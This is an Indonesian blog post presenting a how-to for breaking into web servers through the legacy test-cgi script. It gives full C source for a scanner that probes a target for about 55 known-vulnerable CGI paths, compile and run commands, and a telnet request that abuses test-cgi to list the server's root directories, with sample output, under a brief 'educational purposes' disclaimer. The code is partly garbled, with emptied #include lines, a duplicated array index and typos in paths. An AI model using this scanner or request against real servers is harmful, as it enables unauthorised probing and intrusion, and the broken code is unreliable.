Menjebol apache web server melalui test-cgi Langsung saja, pertama yg perlu dipersiapkan oleh kita adalah scanner untuk melihat vulnerability dari web tersebut, disini saya sertakan juga source programnya, dalam
C.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RMT_PORT 80
#define OXO 1
#define LOOK "200 OK" /* ALL PROBLES HAVE A SOLUTION :) */
#define OUT_FILE "DOuiD.cgi" /* The out-put file with the
result */
main(int argc, char *argv[])
{
struct sockaddr_in rmt_host;
struct hostent *rh;
FILE *f;
char buffer1[BUFSIZ];
char buffer2[BUFSIZ];
char *cgi[100]; /* You Can Change It Of Course */
char *name[100]; /* Here Also */
int sock,i=1;
memset(cgi,0,100);
memset(name,0,100);
memset(buffer1,0,BUFSIZ);
memset(buffer2,0,BUFSIZ);
/* THe CGI's List /cgi-bin/*.* */
cgi[1] = "GET /cgi-bin/phf SH \n\n";
cgi[2] = "GET /cgi-bin/test-cgi SH \n\n";
cgi[3] = "GET /cgi-bin/nph-test-cgi SH \n\n";
cgi[4] = "GET /cgi-bin/whois_raw.cgi SH \n\n";
cgi[5] = "GET /cgi-bin/Count.cgi SH \n\n";
cgi[6] = "GET /cgi-bin/search/tidfinder.cgi SH \n\n";
cgi[7] = "GET /cgi-bin/finger SH \n\n";
cgi[8] = "GET /cgi-bin/tablebuild.pl SH \n\n";
cgi[9] = "GET /cgi-bin/displayTC.pl SH \n\n";
cgi[10] = "GET /cgi-bin/uptime SH \n\n";
cgi[11] = "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c SH
\n\n";
cgi[12] = "GET /cgi-bin/c_download.cgi SH \n\n";
cgi[13] = "GET /cgi-bin/program.pl SH \n\n";
cgi[14] = "GET /cgi-bin/ntitar.pl SH \n\n";
cgi[15] = "GET /cgi-bin/enter.cgi SH \n\n";
cgi[15] = "GET /cgi-bin/query_string.cgi SH \n\n";
cgi[16] = "GET /cgi-bin/AT-generate.cgi SH \n\n";
cgi[17] = "GET /cgi-bin/test.html SH \n\n";
cgi[18] = "GET /cgi-bin/test-unix.html SH \n\n";
cgi[19] = "GET /cgi-bin/printenv SH \n\n";
cgi[20] = "GET /cgi-bin/dasp/fm_shell.asp SH \n\n";
cgi[21] = "GET /cgi-bin/wa SH \n\n";
cgi[22] = "GET /cgi-bin/visadmin.exe SH \n\n";
cgi[23] = "GET /cgi-bin/wguest.exe SH \n\n";
cgi[24] = "GET /cgi-bin/rguest.exe SH \n\n";
cgi[25] = "GET /cgi-bin/AnyForm2 SH \n\n";
cgi[26] = "GET /cgi-dos/args.bat SH \n\n";
cgi[27] = "GET /cgi-bin/perlshop.cgi SH \n\n";
cgi[28] = "GET /cgi-bin/edit.pl SH \n\n";
cgi[29] = "GET /cgi-bin/guestbook.cgi SH \n\n";
cgi[30] = "GET /cgi-bin/cgiwrap SH \n\n";
cgi[31] = "GET /cgi-bin/wrap SH \n\n";
cgi[32] = "GET /cgi-bin/environ.cgi SH \n\n";
cgi[33] = "GET /cgi-bin/classifieds.cgi SH \n\n";
cgi[34] = "GET /cgi-bin/textcounter.pl SH \n\n";
cgi[35] = "GET /cgi-win/uploader.exe SH \n\n";
cgi[36] = "GET /cgi-bin/nph-publish SH \n\n";
cgi[37] = "GET /cgi-bin/handler SH \n\n";
cgi[38] = "GET /cgi-bin/faxsurvey SH \n\n";
cgi[39] = "GET /cgi-bin/php.cgi SH \n\n";
cgi[40] = "GET /cgi-bin/wwwboard.pl SH \n\n";
cgi[41] = "GET /cgi-bin/websendmail SH \n\n";
cgi[42] = "GET /cgi-bin/rwwwshell.pl SH \n\n";
cgi[43] = "GET /cgi-bin/campas SH \n\n";
cgi[44] = "GET /cgi-bin/webdist.cgi SH \n\n";
cgi[45] = "GET /cgi-bin/aglimpse SH \n\n";
cgi[46] = "GET /cgi-bin/man.sh SH \n\n";
cgi[47] = "GET /cgi-bin/info2www SH \n\n";
cgi[48] = "GET /cgi-bin/jj SH \n\n";
cgi[49] = "GET /cgi-bin/files.pl SH \n\n";
cgi[50] = "GET /cgi-bin/maillist.pl SH \n\n";
cgi[51] = "GET /cgi-bin/filemail.pl SH \n\n";
cgi[52] = "GET /cgi-bin/bnbform.cgi SH \n\n";
cgi[53] = "GET /cgi-bin/survey.cgi SH \n\n";
cgi[54] = "GET /cgi-bin/glimpse SH \n\n";
cgi[55] = "GET /cgi-bin/www-sql SH \n\n";
/* CGi Description */
name[1] = "phf ";
name[2] = "test-cgi ";
name[3] = "nph-test-cgi ";
name[4] = "whois_raw.cgi ";
name[5] = "Count.cgi ";
name[6] = "tidfinder.cgi ";
name[7] = "finger ";
name[8] = "tablebuild.pl ";
name[9] = "displayTC.pl ";
name[10] = "uptime ";
name[11] = "expand.c ";
name[12] = "c_download.cgi ";
name[13] = "program.pl ";
name[14] = "ntitar.pl ";
name[15] = "enter.cgi ";
name[16] = "query_tring.cgi ";
name[17] = "test.html ";
name[18] = "test-unix.html ";
name[19] = "printenv ";
name[20] = "fm_shell.asp ";
name[21] = "wa ";
name[22] = "visadmin.exe ";
name[23] = "wguest.exe ";
name[24] = "rguest.exe ";
name[25] = "AnyForm2 ";
name[26] = "args.bat ";
name[27] = "perlshop.cgi ";
name[28] = "edit.pl ";
name[29] = "guestbook ";
name[30] = "cgiwrap ";
name[31] = "wrap ";
name[32] = "environ.cgi ";
name[33] = "classifieds.cgi ";
name[34] = "textcounter.pl ";
name[35] = "uploader.exe ";
name[36] = "nph-publish ";
name[37] = "handler ";
name[38] = "faxsurvey ";
name[39] = "php.cgi ";
name[40] = "wwwboard.pl ";
name[41] = "websendmail ";
name[42] = "rwwwshwll ";
name[43] = "campas ";
name[44] = "webdist.cgi ";
name[45] = "aglimpse ";
name[46] = "man.sh ";
name[47] = "info2www ";
name[48] = "jj ";
name[49] = "files.pl ";
name[50] = "maillist.pl ";
name[51] = "filemail.pl ";
name[52] = "bnbform.cgi ";
name[53] = "survey.cgi ";
name[54] = "slinpse ";
name[55] = "www-sql ";
if ((f=fopen(OUT_FILE,"a"))==NULL){
perror("fopen");
exit(OXO);
}
if (argc != 2){
fprintf(stderr,"Usage: %s \ncgiS.c By ZinC_Sh(C).\n",argv[0]);
exit(OXO);
}
if ((rh=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(OXO);
}
printf("\t\t\t\b\b------------------------\n");
printf("\t\t\t\b\b|\033[6;35m CGi Scaner V1.0.1 .-
\033[0m|\n");
printf("\t\t\t\b\b|\033[6;35m By Scorpionbugs(C).-
\033[0m|\n");
printf("\t\t\t\b\b------------------------\n\n");
while (i < 55) { if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1){ perror("Socket"); exit(OXO); } bzero(&(rmt_host.sin_zero),8); rmt_host.sin_family = AF_INET; rmt_host.sin_addr = *((struct in_addr *)rh->h_addr);
rmt_host.sin_port = htons(RMT_PORT);
if (connect(sock,(struct sockaddr *) &rmt_host
,sizeof(rmt_host)) != 0){
perror("connect");
exit(OXO);
}
printf("LookinG For %s\b\b\b\bCGI in /cgi-bin/ :",name[i]);
send(sock,cgi[i],sizeof(cgi),0);
recv(sock,buffer1,sizeof(buffer1),0);
if((strstr(buffer1,LOOK)) != 0){
printf("\t\033[1;32mCGI FounD !!!\033[0m\n");
fputs("FounD !!!",f);
fputs(cgi[i],f);
} else {
printf("\tCGI NoT FounD.\n");
}
close(sock);
i++;
}
printf("\nKapUt !\nMay The Poula KApribekou Be With You...
(ZinC_Sh).\n");
printf("The Results Will Be Found In THe DOuiD.cgi File.\n");
fclose(f);
return 0;
}
cara compile : gcc cgis.c -o cgis
kalo udah di compile trus sekarang waktunya hack dengan syntak
#cgis 10.1.xx.xx
looking for phf CGI in /cgi-bin/ : CGI Not Found
looking for test-cgi CGI in /cgi-bin/ : CGI Found !!!!
bla bla bla
bla bla
bla
dan hasil scannya disimpan di file DOuiD.cgi, di file ini sih cuma ngasih tahu aja hasil proses scan tersebut nah dibaris kedua kita bisa lihat ternyata cgi-bin/test-cgi ada dan open dalam web tersebut selanjutnya tinggal kita telnet ke 10.1.xx.xx melalui port 80
#telnet 10.1.xx.xx 80
Trying 10.1.xx.xx
Connected to 10.1.xx.xx Escape character is '^}'
GET /cgin-bin/test-cgi?/* report:argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO
= PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib
/mnt /root
/sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
nah di query_string kita bisa lihat seluruh directory selanjutnya terserah anda, saya menyarankan jangan mengubah atau menggangu isi directory tersebut. selamat mencoba.
INFORMASI disini digunakan untuk tujuan pendidikan, Penulis tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar tidak menjadi korban internet.
0 komentar:
Posting Komentar